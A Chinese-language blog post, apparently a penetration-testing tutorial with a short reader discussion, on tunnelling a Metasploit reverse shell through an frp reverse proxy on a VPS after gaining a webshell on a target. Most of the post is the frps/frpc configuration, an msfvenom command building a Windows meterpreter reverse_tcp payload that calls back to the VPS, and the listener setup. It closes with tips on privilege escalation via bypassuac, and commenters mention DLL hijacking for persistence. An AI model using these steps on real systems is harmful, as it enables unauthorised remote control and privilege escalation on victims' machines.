0x00:简介
frp 是一个反向代理工具.可以轻松地进行内网穿透.对外网提供服务,frp支持 tcp协议, http协议, https 等协议类型,并且 web 服务支持根据域名进行路由转发.
0x01:环境交代
靶机:x.x.174.171(下面简称靶机)
kali:192.168.1.106(下面简称kali)
vps:x.x.193.94(下面简称vps)
已在靶机中获取到webshell
0x02:开始反向
一、在vps中在下载frp并编辑frps.ini
vim frps.ini
#frp服务端与客户端连接端口,frps和frpc必须一致
bind_port = 7000
启动frps:./frps -c ./frps.ini
二、在kali中在下载frp并编辑frpc.ini
vim frpc.ini
[common]
server_addr = x.x.193.94
server_port = 7000 #frpc工作端口,必须和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的5555
remote_port = 6000 #服务端用6000端口转发给本机
启动frpc:./frpc -c ./frpc.ini
这里frp反向代理做完了,下面开始MSF马制作与设置监听.
三、MSF制作马
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe
这里注意一下:
lport的端口是你frpc.ini里面的remote_port = 6000端口
四、设置监听、执行msf马
这里注意一下:
set lhost 127.0.0.1 #设置监听ip,必须和frpc中的local_ip 一致
set lport 5555 #设置监听端口,与frpc中的local_port一致
到靶机去执行i.exe
观察vps上的frp
观察本地的kali
已获取到shell
tips:内置模块Local Exploit Suggester.这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权.
本人最常用的bypassuac模块
exploit/windows/local/bypassuac
洛米唯熊 发起了一个读者讨论 大佬们,你们提权是常用哪个模块呢? 精选讨论内容
Leon
啊d模块
作者kali 里面的阿D最好用
Aa.Kay我用cs的 dll马
作者dll劫持 维持权限,可以可以
网友评论